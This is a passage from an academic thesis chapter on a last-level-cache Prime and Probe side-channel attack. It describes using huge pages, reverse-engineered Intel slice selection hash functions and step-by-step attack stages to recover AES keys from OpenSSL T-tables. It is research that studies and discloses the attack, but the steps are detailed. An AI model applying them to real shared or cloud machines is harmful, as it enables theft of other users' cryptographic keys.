rithm is again not described, although it is mentioned that many bits of the physical
address are involved. Hund et al. [HWH13] were the only ones describing the slice
selection algorithm for a specific processor, i.e, the i7-2600 processor. They recover
the slice selection algorithm by comparing Hamming distances of different physical
addresses. This information was again not needed with the Flush and Reload and
Invalidate and Transfer as we could evict a memory block from the cache with the
clflush instruction in systems where deduplication is enabled.
6.3 The Original Prime and Probe Technique
The new attack proposed in this work is based on the methodology of the known
Prime and Probe technique. Prime and Probe is a cache-based side channel attack
technique used in [OST06, ZJOR11, ZJRR12] that can be classified as an access
driven cache attack. The spy process ascertains which of the sets have been accessed
in the cache by a victim. The attack is carried out in 3 stages:
83
SLICE
Cache tag Set ByteS0
S1
SN.
.
.
Figure 6.2: Last level cache addressing methodology for Intel processors. Slices are
selected by the tag, which is given as the MSBs for the physical address.
•Priming stage: In this stage, the attacker fills the monitored cache with own
cache lines. This is done by reading own data.
•Victim accessing stage: In this stage the attacker waits for the victim to
access some positions in the cache, causing the eviction of some of the cache
lines that were primed in the first stage.
•Probing stage: In this stage the attacker accesses the priming data again.
When the attacker reloads data from a set that has been used by the victim,
some of the primed cache lines have been evicted, causing a higher probe time.
However if the victim did not use any of the cache lines in a monitored set, all
the primed cache lines will still reside in the cache causing a low probe time.
6.4 Limitations of the Original Prime and Probe
Technique
The original Prime and Probe technique was successfully applied to L1 caches to
recover cryptographic keys. It is therefore an open question why, with multi-core
systems and shared LLCs, no work prior to this has applied it into the LLC to
recover information across cores. Here we summarize the three main problems of
taking the Prime and Probe attack to the LLC:
•The L1 Prime and Probe attack fills the whole L1 cache with attackers data.
As the LLC is usually at least two orders of magnitude bigger than the L1,
filling the entire LLC does not seem a realistic approach.
84
•As memory pages are usually 4KB pages and the page offset remains untouched
in the virtual address translation, the attacker gains enough bits of information
to fully know the location of a memory block in the L1. However, as the
LLC has more sets, the attacker is unable to predict the set that his memory
addresses will occupy.
•The LLC in Intel, as previously described, is divided into slices after the release
of the Sandy Bridge architecture. The slice that a memory block occupies is
decided by an undocumented hash algorithm. Thus, an attacker that might
be willing to fill one of the sets in the LLC might observe how his addresses
get distributed across several slices and do not fill the set.
In the following sections we solve the aforementioned challenges to successfully
apply the Prime and Probe attack in the LLC.
6.5 Targeting Small Pieces of the LLC
The first obstacle when executing thew original Prime and Probe attack in the LLC
is the vast number of memory addresses needed to fill it. Instead, we will only target
smaller pieces of it that will give us enough information of the secret process being
executed by a victim.
Recall algorithm 2 from Section 2.4.2. The modular exponentiation leaked infor-
mation due to the usage of the multiplication function when a ”1”’ bit was found.
Instead of filling the entire cache, we can just perform the Prime and Probe attack
in the LLC set where the multiplication resides. This gives us enough information
about when the multiplication function is used, and therefore, when the victim is
processing a ”1”’ or a ”‘0”’ bit. We will cover in future sections how to know where
this multiplication function resides.
6.6 LLC Set Location Information Enabled by Huge
Pages
The second obstacle that the original Prime and Probe attack encounters when tar-
geting the LLC is that the set occupied by the attackers memory blocks is unknown
in the LLC, due to the lack of control on the physical address bits. The LLC Prime
and Probe attack proposed in this work, is enabled by making use of Huge pages and
thereby eliminating a major obstacle that normally restricts the Prime and Probe
attack to target the L1 cache. As explained in Section 6.1, a user does not use
the physical memory directly, but he is assigned a virtual memory so that a trans-
lation stage is performed from virtual to physical memory at the hardware level.
The address translation step creates an additional challenge to the attacker since
real addresses of the variables of the target process are unknown to him. However
85
?
 ?
 ?
 Offset4 KB page
Offset =12 bits
?
 Offset2 MB page
Offset =21 bitsBA
L1
L2
L36
6
9
1112 bits
21 bitsVirtual
Address
Virtual
AddressFigure 6.3: Regular Page (4 KB, top) and Huge Page (256 KB, bottom) virtual to
physical address mapping for an Intel x86 processor. For Huge pages the entire L3
cache sets become transparently accessible even with virtual addressing.
this translation is only performed in some of the higher order bits of the virtual
address, while a lower portion, named the offset , remains untouched. Since caches
are addressed by the physical address, if we have cache line size of bbytes, the lower
log2(b) bits of the address will be used to resolve the corresponding byte in the
cache line. Furthermore if the cache is set-associative and for instance divided into
nsets, then the next log2(n) bits of the address will select the set that each memory
data is going to occupy in the cache. The log2(b)-bits that form the byte address
within a cache line, are contained within the offset field. However, depending on the
cache size the following field which contains the set address may exceed the offset
boundary. The offsets allow addressing within a memory page. The OS’s Memory
Management Unit (MMU) keeps track of which page belongs to which process. The
page size can be adjusted to better match the needs of the application. Smaller
pages require more time for the MMU to resolve.
Here we focus on the default 4 KB page size and the larger page sizes provided
under the common name of Huge pages. As we shall see, the choice of page size will
make a significant difference in the attackers ability to carry out a successful attack
on a particular cache level:
•4 KB pages: For 4 KB pages, the lower 12-bit offset of the virtual address
is not translated while the remaining bits are forwarded to the Memory Man-
agement Unit. In modern processors the memory line size is usually set as 64
bytes. This leaves 6 bits untouched by the Memory Management Unit while
translating regular pages. As shown in the top of Figure 6.3 the page offset is
known to the attacker. Therefore, the attacker knows the 6-bit byte address
86
plus 6 additional bits that can only resolve accesses to small size caches (64
sets at most). This is the main reason why techniques such as Prime and
Probe have only targeted the L1 cache, since it is the only one permitting the
attacker to have full control of the bits resolving the set. Therefore, the small
page size indirectly prevents attacks targeting big size caches like the L2 and
L3 caches.
•Huge pages: The scenario is different if we work with huge size pages. Typ-
ical huge page sizes are at 1 MB or even greater. This means that the offset
field in the page translation process is bigger, with 21 bits or more remaining
untouched during page translation. Observe the example presented in Fig-
ure 6.3. For instance, assume that our computer has 3 levels of cache, with
the last one shared, and that 64, 512 and 2048 are the number of sets the
L1, L2 and L3 caches are divided into, respectively. The first lowest 6-bits of
the offset are used for addressing the 64 byte long cache lines. The following
6 bits are used to resolve the set addresses in the L1 cache. For the L2 and
L3 caches this field is 9 and 11-bits wide, respectively. In this case, a huge
page size of 2 MB (21 bit offset) will give the attacker full control of the set
occupied by his data in all three levels of cache, i.e. L1, L2 and L3 caches. The
significance of targeting last level cache becomes apparent when one considers
the access time gap between the last level cache and the memory, which is
much more pronounced compared to the access time difference between the
L1 and L2 caches. Therefore, using huge pages makes it possible to reach a
higher resolution Prime and Probe style attack.
6.7 Reverse Engineering the Slice Selection Algo-
rithm
The last inconvenience that we observe when executing Prime and Probe in the LLC
is the fact that the LLC is divided into slices, whose assignment is decided by an
undocumented hash function. This means that the attacker cannot control which
slice is targeted. Although knowing the slice selection algorithm implemented is not
crucial to run a Prime and Probe attack (since we could calculate the eviction set for
every setsthat we want to monitor), the knowledge of the non-linear slice selection
algorithm can save significant time, specially when we have to profile a big number
of sets. Indeed, in the attack step, we can select a range of sets/slices s1,s2,...s nfor
which, thanks to the knowledge of the non-linear slice selection algorithm, we know
that the memory blocks in the eviction set will not change. This section describes
the methodology applied to reverse engineer the slice selection algorithm for specific
Intel processors. Note that the method can be used to reverse engineer slice selection
algorithms for other Intel processors that have not been analyzed in this work. To
the best of our knowledge, this slice selection hash function is not public. We solves
87
the issue by:
•Generating data blocks at slice-colliding addresses to fill a specific set. Access
timings are used to determine which data is stored in the same slice.
•Using the addresses of data blocks identified to be co-residing in slices to
generate a system of equations. The resulting equation systems can then be
solved to identify the slice selection algorithm implemented by the processor.
•Building a scalable tool, i.e, proving its applicability for a wide range of dif-
ferent architectures.
6.7.1 Probing the Last Level Cache
As stated in Section 6.2, the shared last level caches in SMP multicore architectures
are usually divided into slices, with an unknown hash function that determines the
slice. In order to be able to reverse engineer this hash function, we need to recover
addresses of data blocks co-residing in a set of a specific slice. The set where a
data block is placed can be controlled, even in the presence of virtual addressing, if
huge size pages are used. Recall that by using 2MB huge size pages we gain control
over the least significant 21 bits of the physical address, thereby controlling the set
in which our blocks of data will reside. Once we have control over the set a data
block is placed in, we can try to detect data blocks co-residing in the same slice.
Co-residency can be inferred by distinguishing LLC accesses from memory accesses.
6.7.2 Identifying mData Blocks Co-Residing in a Slice
We need to identify the mmemory blocks that fill each one of the slices for a specific
set. Note that we still do not know the memory blocks that collide in a specific set.
In order to achieve this goal we perform the following steps:
•Step 1: Access one memory block b0in a set in the LLC
•Step 2: Access several additional memory blocks b1,b2,...,b nthat reside in
the same set, but may reside in a different slice, in order to fill the slice where
b0resides.
•Step 3: Reload the memory block b0to check whether it still resides in the last
level cache or in the memory. A high reload time indicates that the memory
blockb0has been evicted from the slice, since intel utilizes a Pseudo Last
Recently Used (PLRU) cache eviction algorithm. Therefore we know that the
requiredmmemory blocks to evict b0 from the slice are part of the accessed
additional memory blocks b1,b2,...,b n.
88
0 5 10 15 20 25 30510152025
Line numberHardware cyclesFigure 6.4: Generating additional memory blocks until a high reload value is ob-
served, i.e., the monitored block is evicted from the LLC. The experiments were
performed in an Intel i5-3320M.
•Step 4: Subtract one of the accessed additional memory blocks biand repeat
the protocol. If b0still resides in memory, bidoes not reside in the same slice.
Ifb0resides in the cache, it can be concluded that biresides in the same cache
slice asb0.
Steps 2 and 3 can be graphically seen in Figure 6.4, where additional mem-
ory blocks are generated until a high reload time is observed, indicating that the
monitored block b0was evicted from the LLC cache after memory block b26was
accessed. Step 4 is also graphically presented in Figure 6.5 where each additional
block is checked to see whether it affects the reload time observed in Figure 6.4. If
the reload time remains high when one of the blocks biis no longer accessed, bidoes
not reside in the same slice as the monitored block b0. In our particular case, we
observe that the slice colliding blocks are b3,b4,b7,b9,b10,b13,b14,b17,b18,b21,b22and
b24
6.7.3 Generating Equations Mapping the Slices
Oncemmemory blocks that fill one of the cache slices have been identified, we
generate additional blocks that reside in the same slice to be able to generate more
equations. The approach is similar to the previous one:
•Access the mmemory blocks b0,b1,...,b mthat fill one slice in a set in the
LLC
89
0 5 10 15 20 25 3051015202530
Line numberHardware cyclesFigure 6.5: Subtracting memory blocks to identify the mblocks mapping to one
slice in an Intel i5 3320-M. Low reload values indicate that the line occupies the
same slice as the monitored data.
•Access, one at a time, additional memory blocks that reside in the same set,
but may reside in a different slice
•Reload the memory block b0to check whether it still resides in the LLC or
in memory. Again, due to the PLRU algorithm, a high reload time indicates
thatb0has been evicted from the slice. Hence, the additional memory block
also resides in the same cache slice.
•Once a sufficiently large group of memory blocks that occupy the same LLC
slice has been identified, we get their physical addresses to construct a matrix
Piof equations, where each row is one of the physical addresses mapping to
the monitored slice.
The equation generation stage can be observed in Figure 6.6, where 4000 ad-
ditional memory blocks occupying the same set were generated. Knowing the m
blocks that fill one slice, accessing an additional memory block will output a higher
reload value if it resides in the same slice as b0(since it evicts b0from the cache).
Handling Noise: We choose a detection threshold in such a way that we most
likely only deal with false negatives, which do not affect correctness of the solutions
of the equation system. As it can be observed in Figure 6.6, there are still a few
values that are not clearly identified (i.e, those with reload values of 10-11 cycles). By
simply not considering these, false positives are avoided and the resulting equation
system remains correct.
90
50010001500200025003000350051015202530
Line numberHardware cyclesFigure 6.6: Generating equations mapping one slice for 4000 memory blocks in an
Intel i5 3320-M. High reload values indicate that the line occupies the same slice as
the monitored data.
6.7.4 Recovering Linear Hash Functions
The mapping of a memory block to a specific slice in LLC cache is based on its
physical address. A hash function H(p) takes the physical address pas an input
and returns the slice the address is mapped to. We know that Hmaps all possible
ptosoutputs, where sis the number of slices for the processor.
H:{0,1}⌈log2p⌉h− →{0,1}⌈log2s⌉
The labeling of these outputs is arbitrary. However, each output should occur with
a roughly equal likelihood, so that accesses are balanced over the slices. We model
Has a function on the address bits. In fact, as we will see, the observed hash
functions are linear in the address bits pi. In such a case we can model Has a
concatenation of linear Boolean functions H(p) =H0(p)||...||H⌈log2s⌉−1(p), where
||is concatenation. Then, Hiis given as
Hi(p) =hi,0p0+hi,1p1+...h i,lpl=l∑
0hi,jpj.
Here,hi,j∈{0,1}is a coefficient and pjis a physical address bit. The steps in
the previous subsections provide addresses pmapped to a specific slice, which are
combined in a matrix Pi, where each row is a physical address p. The goal is to
recover the functions Hi, given as the coefficients hi,j. In general, for linear systems,
91
theHican be determined by solving the equations
Pi·ˆHi=ˆ0, (6.1)
Pi·ˆHi=ˆ1 (6.2)
where ˆHi= (hi,0,hi,1,...,h i,l)Tis a vector containing all coefficients of Hi. The
right hand side is the ith bit of the representation of the respective slice, where
ˆ0 and ˆ1 are the all zeros and all ones vectors, respectively. Note that finding a
solution to Equation (6.1) is equivalent to finding the kernel (null space) of the
matrixPi. Also note that any linear combination of the vectors in the kernel is
also a solution to Equation (6.1), whereas any linear combination of a particular
solution to Equation (6.2) and any vector in the kernel is also a particular solution
to Equation (6.2). In general:
ˆh∈kerPi⇐⇒Pi·ˆh=ˆ0
∀ˆh1,ˆh2∈kerPiˆh1+ˆh2∈kerPi
∀ˆh1,ˆh2|Pi·ˆh1=ˆ1,ˆh2∈kerPi:Pi·(ˆh1+ˆh2) =ˆ1
Recall that each equation system should map to x=⌈log2(s)⌉bit selection
functionsHi. Also note that we cannot infer the labeling of the slices, although the
equation system mapping to slice 0 will never output a solution to Equation (6.2).
This means that there is more than one possible solution, all of them valid, if
the number of slices is greater than 2. In this case,(2x−1
x)
solutions will satisfy
Equation (6.1). However, any combination of xsolutions is valid, differing only in
the label referring to each slice.
We have only considered linear systems in our explanation. In the case of having
a nonlinear system (i.e., the number of slices is not a power of two), the system
becomes non-linear and needs to be re-linearized. This can be done by expanding the
above matrix Piwith the non-linear terms Pilinear|Pinonlinear and solve Equations (6.1)
and (6.2). Note that the higher the degree of the non-linear terms, the bigger
number of equations that are required to solve the system. For that reason, later
in Section 6.7.7 we present an example on an alternative (more intuitive) approach
that can be taken to recover non-linear slcie selection algorithms.
This tool can also be useful in cases where the user cannot determine the slice
selection algorithm, e.g., due to a too low number of derived equations. Indeed, the
first step that this tool implements is generating the memory blocks that co-reside
in each of the slices. This information can already be used to mount a side channel
attack.
6.7.5 Experiment Setup for Linear Hash Functions
In this section we describe our experiment setup. In order to test the applicability
of our tool, we implemented our slice selection algorithm recovery method in a wide
92
Table 6.1: Comparison of the profiled architectures
Processor Architecture LLC size Associativity Slices Sets/slice
Intel i5-650 [i65] Nehalem 4MB 16 2 2048
Intel i5-3320M [inta] Ivy Bridge 3MB 12 2 2048
Intel i5-4200M [iM] Haswell 3MB 12 2 2048
Intel i7-4702M [i74] Haswell 6MB 12 4 2048
Intel Xeon E5-2609v2 [intb] Ivy bridge 10MB 20 4 2048
Intel Xeon E5-2640v3 [intc] Haswell 20MB 20 8 2048
range of different computer architectures. The different architectures on which our
tool was tested are listed in Table 6.1, together with the relevant parameters. Our
experiments cover a wide range of linear (power of two) slice sizes as well as different
architectures.
All architectures except the Intel Xeon e5-2640 v3, were running Ubuntu 12.04
LTS as the operating system, whereas the last one used Ubuntu 14.04. Ubuntu,
in root mode, allows the usage of huge size pages. The huge page size in all the
processors is 2MB [Lin]. We also use a tool to obtain the physical addresses of the
variables used in our code by looking at the /proc/PID/pagemap file. In order to
obtain the slice selection algorithm, we profiled a single set, i.e, set 0. However, in
all the architectures profiled in this paper, we verified that the set did not affect the
slice selection algorithm. This might not be true for all Intel processors.
The experiments cover wide selection of architectures, ranging from Nehalem
(released in 2008) to Haswell (released in 2013) architectures. The processors include
laptop CPUs (i5-3320, i5-4200M and i7-4200M), desktop CPUs (i5-650) and server
CPUs (Xeon E5-2609v2, Xeon E5-2640v3), demonstrating the viability of our tool
in a wide range of scenarios.
As it can be seen, in the entire set of processors that we analyzed, each slice
gets 2048 sets in the L3 cache. Apparently, Intel designs all of its processors in such
a way that every slice gets all 2048 sets of the LLC. Indeed, this is not surprising,
since it allows to use cache addressing mechanisms independent from the size or the
number of cores present in the cache. This also means that 17 bits are required from
the physical address to select the set in the last level cache. This is far from the 21
bit freedom that we obtain with the huge size pages.
6.7.6 Results for Linear Hash Functions
Table 6.2 summarizes the slice selection algorithm for all the processors analyzed in
this work.
The Intel i650 processor is the oldest one that was analyzed. Indeed, the slice
selection algorithm that it implements is much simpler than the rest of them, in-
volving only one single bit to decide between the two slices. This bit is the 17th
bit, i.e., the bit consecutive to the last one selecting the set. This means that an
93
Table 6.2: Slice selection hash function for the profiled architectures
Processor Architecture Solutions Slice selection algorithm
Intel i7-2600 [HWH13] Sandy Bridge p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31
p17⊕p19⊕p20⊕p21⊕p22⊕p23⊕p24⊕p26⊕p28⊕p29⊕p31
Intel i650 Nehalem 1 p17
Intel i5-3320M Ivy Bridge 1 p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
Intel i5-4200M Haswell 1 p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
Intel i7-4702M Haswell 3 p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31⊕p32
Intel Xeon Ivy Bridge 3 p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
E5-2609 v2 p18⊕p19⊕p21⊕p23⊕p25⊕p27⊕p29⊕p30⊕p31⊕p32
Intel Xeon Haswell 35 p17⊕p18⊕p20⊕p22⊕p24⊕p25⊕p26⊕p27⊕p28⊕p30⊕p32
E5-2640 v2 p19⊕p22⊕p23⊕p26⊕p27⊕p30⊕p31
p17⊕p20⊕p21⊕p24⊕p27⊕p28⊕p29⊕p30
attacker using Prime and Probe techniques can fully control both slices, since all
the bits are under his control.
It can be seen that the Intel i5-3320M and Intel i5-4200M processors implement
a much more complicated slice selection algorithm than the previous one. Since
both processors have 2 slices, our method outputs one single solution, i.e, a single
vector in the kernel of the system of equations mapping to the zero slice. Note the
substantial change between these processors and the previous one, which evaluate
many bits in the hash function. Note that, even though both processors have differ-
ent microarchitectures and are from different generations, they implement the same
slice selection algorithm.
We next focus on the 4 slice processors analyzed, i.e., the Intel i7-4702MQ and
the Intel Xeon E5-2609. Again, many upper bits are used by the hash function to
select the slice. We obtain 3 kernel vectors for the system of equations mapping
to the zero slice (two vectors and the linear combination of them). From the three
solutions, any combination of two solutions (one for h0 and one for h1) is a valid
solution, i.e, the 4 different slices are represented. However, the labeling of the slices
is not known. Therefore, choosing a different solution combination will only affect
the labeling of the non-zero slices, which is not important for the scope of the tool.
It can also be observed that, even when we compare high end servers (Xeon-2609)
and laptops (i7-4702MQ) with different architectures, the slice selection algorithm
implemented by both of them is the same. Further note that one of the functions is
equal to the one discussed for the two core architectures. We can therefore say that
the hash function that selects the slice for the newest architectures only depends on
the number of slices.
Finally, we focus on the Intel Xeon E5-2640v3, which divides the last level cache
in 8 slices. Note that this is a new high end server, which might be commonly
found in public cloud services. In this case, since 8 slices have to be addressed, we
need 3 hash functions to map them. The procedure is the same as for the previous
94
processor: we first identify the set of equations that maps to slice 0 (remember, this
will not output any possible solution to 1) by finding its kernel. The kernel gives
us 3 possible vectors plus all their linear combinations. As before, any solution that
takes a set of 3 vectors will be a valid solution for the equation system, differing
only in the labeling of the slices. Note also that some of the solutions have only up
to 6 bits of the physical address, making them suitable for side channel attacks.
In summary, we were able to obtain all the slice selection hash functions for all
cases. Our results show that the slice selection algorithm was simpler in Nehalem
architectures, while newer architectures like Ivy Bridge or Haswell use several bits
of the physical address to select the slice. We also observed that the slice selection
algorithm mostly depends on the number of slices present, regardless of the type of
the analyzed CPU (laptop or high end servers).
6.7.7 Obtaining Non-linear Slice Selection Algorithms
It is important to note that Prime and Probe attacks become much simpler when
architectures with linear slice selection algorithms are targeted, because the memory
blocks to create an eviction set for different set values do not change. This means
that we can calculate the eviction set for, e.g, set 0 and the memory blocks will be
the same if we profile a different set s. As we will see in this section, this is not true
for non-linear slice selection algorithms (where the profiled set also affects the slice
selected).
We utilize the Intel Xeon E5-2670 v2 as an example, the most widely used EC2
instance type, which has a 25MB LLC distributed over 10 LLC slices. By just per-
forming some small tests we can clearly observe that the set field affects the slice
selection algorithm implemented by the processor. Indeed, it is also clearly observ-
able that the implemented hash function is a non-linear function of the address bits,
since the 16 memory blocks mapped to the same set in a huge memory page cannot
be evenly distributed over 10 slices. Thus we describe the slice selection algorithm
as
H(p) =h3(p)∥h2(p)∥h1(p)∥h0(p) (6.3)
where each H(p) is a concatenation of 4 different functions corresponding to the
4 necessary bits to represent 10 slices. Note that H(p) will output results from
0000 to 1001 if we label the slices from 0-9. Thus, a non-linear function is needed
that excludes outputs 10-15. Further note that pis the physical address and will
be represented as a bit string: p=p0p1...p 35. In order to recover the non-linear
hash function implemented by the Intel Xeon E5-2670 v2, we perform experiments
in a fully controlled machine featuring the Intel Xeon E5-2670 v2. We first generate
ten equation systems based on addresses colliding in the same slice by applying the
same methodology explained in Section 6.7.4 and generating up to 100,000 additional
memory blocks. We repeat the same process 10 times, changing the primed memory
blockb0in each of them to target a different slice. This outputs 10 different systems
95
−10123456789107000750080008500900095001000010500
Slice numberNumber of addressesFigure 6.7: Number of addresses that each slice takes out of 100,000. The non-linear
slices take less addresses than the linear ones.
of addresses, each one referring to a different slice.
The first important observation we made on the 10 different systems is that 8 of
them behave differently from the remaining 2. In 8 of the address systems recovered,
if 2 memory blocks in the same huge memory page collide in the same slice, they
only differ in the 17th bit. This is not true for the remaining two address systems.
We suspect, at this point, that the 2 systems behaving differently are the 8th and
9th slice. We will refer to these two slices as the non-linear slices.
Up to this point, one can solve the non-linear function after a re-linearization
step given sufficiently many equations. However, one may not be able to recover
enough addresses. Recall that the higher the degree of the non-linear term the more
equations are needed. In order to keep our analysis simpler, we decided to take a
different approach. The second important observation we made is on the distribution
of the addresses over the 10 slices. It turns out that the last two slices are mapped to
with a lower number of addresses than the remaining 8 slices. Figure 6.7 shows the
distribution of the 100,000 addresses over the 10 slices. The different distributions
seen for the last two slices give us evidence that a non-linear slice selection function
is implemented in the processor. Even further, it can be observed that the linear
slices are mapped to by 81 .25% of the addresses, while the non-linear slices get only
about 18.75%. The proportion is equal to 3 /16. We will make use of this uneven
distribution later.
We proceed to first solve the first 8 slices and the last 2 slices separately using
linear functions. For each we try to find solutions to the equations 6.1 and 6.2. This
outputs two sets of a linear solutions both for the first 8 linear slices and the last 2
slices separately.
Given that we can model the slice selection functions separately using linear
functions, and given that the distribution is non-uniform, we suspect that the hash
function is implemented in two levels. In the first level a non-linear function chooses
between either of the 3 linear functions describing the 8 linear slices or the linear
96
Table 6.3: Hash selection algorithm implemented by the Intel Xeon E5-2670 v2
Vector Hash function H(p) =h0(p)∥¬(nl(p))·h′
1(p)∥¬(nl(p))·h′
2(p)∥nl(p)
h0p18⊕p19⊕p20⊕p22⊕p24⊕p25⊕p30⊕p32⊕p33⊕p34
h′
1p18⊕p21⊕p22⊕p23⊕p24⊕p26⊕p30⊕p31⊕p32
h′
2p19⊕p22⊕p23⊕p26⊕p28⊕p30
v0p9⊕p14⊕p15⊕p19⊕p21⊕p24⊕p25⊕p26⊕p27⊕p29⊕p32⊕p34
v1p7⊕p12⊕p13⊕p17⊕p19⊕p22⊕p23⊕p24⊕p25⊕p27⊕p31⊕p32⊕p33
v2p9⊕p11⊕p14⊕p15⊕p16⊕p17⊕p19⊕p23⊕p24⊕p25⊕p28⊕p31⊕p33⊕p34
v3p7⊕p10⊕p12⊕p13⊕p15⊕p16⊕p17⊕p19⊕p20⊕p23⊕p24⊕p26⊕p28⊕p30⊕p31⊕p32⊕p33⊕p34
nl v 0·v1·¬(v2·v3)
functions describing the 2 non-linear slices. Therefore, we speculate that the 4 bits
selecting the slice look like:
H(p) =

h0(p) =h0(p)
h1(p) =¬(nl(p))·h′
1(p)
h2(p) =¬(nl(p))·h′
2(p)
h3(p) =nl(p)
whereh0,h1andh2are the hash functions selecting bits 0,1 and 2 respectively, h3
is the function selecting the 3rd bit and nlis a nonlinear function of an unknown
degree. We recall that the proportion of the occurrence of the last two slices is 3 /16.
To obtain this distribution we need a degree 4 nonlinear function where two inputs
are negated, i.e.:
nl=v0·v1·¬(v2·v3) (6.4)
Wherenlis 0 for the 8 linear slices and 1 for the 2 non-linear slices. Observe that nl
will be 1 with probability 3 /16 while it will be zero with probability 13 /16, matching
the distributions seen in our experiments. Consequently, to find v0andv1we only
have to solve Equation (6.2) for slices 8 and 9 together to obtain a 1 output. To find
v2andv3, we first separate those addresses where v0andv1output 1 for the linear
slices 0−7. For those cases, we solve Equation (6.2) for slices 0 −7. The result is
summarized in Table 6.3. We show both the non-linear function vectors v0,v1,v2,v3
and the linear functions h0,h1,h2. These results describe the behavior of the slice
selection algorithm implemented in the Intel Xeon E5-2670 v2. It can be observed
that the bits involved in the set selection (bits 6 to 16 for the LLC) are also involved
in the slice selection process, unlike with linear selection algorithms. This means
that for different sets, different memory blocks will map to the same slice.
Note that the method applied here can be used to reverse engineer other machines
that use different non-linear slice selection algorithms. By looking at the distribution
of the memory blocks over all the slices, we can always get the shape of the non-
linear part of the slice selection algorithm. The rest of the steps are generic, and
can be even applied for linear slices selection algorithms.
97
100 200 300 400 500 600 70000.20.40.60.81Probability cache access
Hardware cycles  
100 200 300 400 500 600 70000.010.020.030.040.05
Probability memory accessL3 cache AccessTime histogram
Memory AccessTime histogramFigure 6.8: Histograms of 10,000 access times in the probe stage when all the lines
are in the L3 cache and when all except one are in the cache (and the other one in
the memory).
6.8 The LLC Prime and Probe Attack Procedure
With the previously discussed challenges solved, we can proceed to apply our LLC
Prime and Probe attack. Our LLC Prime and Probe technique takes advantage of
the control of the lower kbits in the virtual address that we gain with the huge size
pages and the knowledge of the slice selection algorithm. These are the main steps
that our spy process will follow to detect accesses to the last level cache:
•Step 1 Allocation of huge size pages if available: The spy process is
based on the control that the attacker gains on the virtual address when using
huge size pages. Therefore the spy process has to have access to the available
huge pages, which requires administrator rights. Recall that this is not a
problem in the cloud scenario where the attacker has administrator privileges
to his guest OS. If huge size pages are not available, an attacker can start from
step 2 at the cost of a more time-consuming eviction set discovery.
•Step 2 Find eviction-sets: Due to the slice selection algorithm, an attacker
has first to deduce which of his memory blocks collide in the same set-slice. To
do this, he can be aided by the slice selection algorithm knowledge acquired
previously in Section 6.7.4, speeding up the attack process. If the slice selection
algorithm is not know, an attacker can also create eviction sets ”on the fly”,
again at the cost of a more challenging and complicated process.
•Step 3 Prime the desired set-slice in the last level cache: In this step
the attacker creates data that will occupy one of the sets-slices in the last level
98
cache. By controlling the virtual address (and, if known, the slice selection
algorithm), the attacker knows the set-slice that the created data will occupy
in the last level cache. Once sufficiently many blocks are created to occupy the
set and slice, the attacker primes the set-slice and ensures it is filled. Typically
the last level caches are inclusive. Thus we will not only fill the shared last
level cache set but also the corresponding sets in the upper level caches.
•Step 4: Victim process runs: After the priming stage, the victim runs the
target process. Since one of the sets-slices in the last level cache is already
filled, if the targeted process uses the monitored it, one of the primed blocks is
going to be evicted. Remember we are priming the last level cache, so evictions
will cause memory blocks to reside in the memory. If the monitored set-slice is
not used, all the primed blocks are still going to reside in the cache hierarchy
after the victim’s process execution.
•Step 5: Probe and measure: Once the victim’s process has finished, the
spy process probes the primed memory blocks and measures the time to probe
them all. If one or more blocks have been evicted by the targeted process,
they will be loaded from the memory and we will see a higher probe time.
However if all the blocks still reside in the cache, then we will see a shorter
probe time.
The last step can be made more concrete with the experiment results summarized
in Figure 6.8. The experiment was performed in native execution (no VM) on an
Intel i5-650 that has a 16-way associative last level cache. It can be seen that when
all the blocks reside in the last level cache we obtain very precise probe timings with
average around 250 cycles and with very little variance. However when one of the
blocks is evicted from last level cache and resides in memory, both the access time
and the variance are higher. We conclude that both types of accesses are clearly
distinguishable.
6.8.1 Prime and Probe Applied to AES
In this section we proceed to explain how the Prime and Probe spy process can be ap-
plied to attack AES. Again, we use the C reference implementation of OpenSSL1.0.1f
library which uses 4 different T-tables during the AES execution. Recovering one
round key is sufficient for AES-128, as the key scheduling is invertible.
We use the last round as our targeted round for convenience. Since the 10thround
does not implement the MixColumns operation, the ciphertext directly depends on
the T-table position accessed and the last round key. Assume Sito be the value of
theith byte prior to the last round T-table look up operation. Then the ciphertext
byteCiwill be:
Ci=Tj[Si]⊕K10
i (6.5)
99
whereTjis the corresponding T-table applied to the ithbyte andK10
i. It can be
observed that if the ciphertext and the T-table positions are known, we can guess
the key by a simple XOR operation. We assume the ciphertext to be always known
by the attacker. Therefore the attacker will use the Prime and Probe spy process to
guess the T-table position that has been used in the encryption and consequently,
obtain the key. Thus, if the attacker knows which set each of the T-table memory
lines occupies, Prime and Probe will detect that the set is not accessed 8% of the
time, and once he has gotten enough measurements, the key can be obtained from
Equation 6.5.
Locating the Set of the T-Tables: The previous description implicitly assumes
that the attacker knows the location, i.e. the sets, that each T-table occupies in
the shared cache. A simple approach to gain this knowledge is to prime and probe
every set in the cache, and analyze the timing behavior for a few random AES
encryptions. The T-table based AES implementation leaves a distinctive fingerprint
on the cache, as T-table size as well as the access frequency (92% per line per
execution) are known. Once the T-tables are detected, the attack can be performed
on a single line per table. Nevertheless, this locating process can take a significant
amount of time when the number of sets is sufficiently high in the outermost shared
cache.
An alternative, more efficient approach is to take advantage of the shared library
page alignment that some OSs like Linux implement. Assuming that the victim is
not using huge size pages for the encryption process, the shared library is aligned at
a 4 KB page boundary. This gives us some information to narrow down the search
space, since the lower 12 bits of the virtual address will not be translated. Thus, we
know the offset fimodulo 64 of each T-table memory line and the T-table location
process has been reduced by a factor of 64. Furthermore, we only have to locate
one T-table memory line per memory page , since the remaining table occupies the
consecutive sets in the last level cache.
Attack stages: Putting all together, these are the main stages that the we follow
to attack AES with Prime and Probe
•Step 1: Last level cache profile stage: The first stage to perform the
attack is to gain knowledge about the structure of the last level cache, the
number of slices, and the lines that fill one of the sets in the last level cache.
•Step 2: T-table set location stage: The attacker has to know which set
in the last level cache each T-table occupies, since these are the sets that need
to be primed to obtain the key.
•Step 3: Measurement stage: The attacker primes the desired sets-slices,
requests encryptions and probes again to check whether the monitored sets
have been used or not.
100
•Step 4: Key recovery stage: Finally, the attacker utilizes the measurements
taken in Step 3 to derive the last round key used by the AES server.
6.8.2 Experiment Setup and Results for the AES Attack
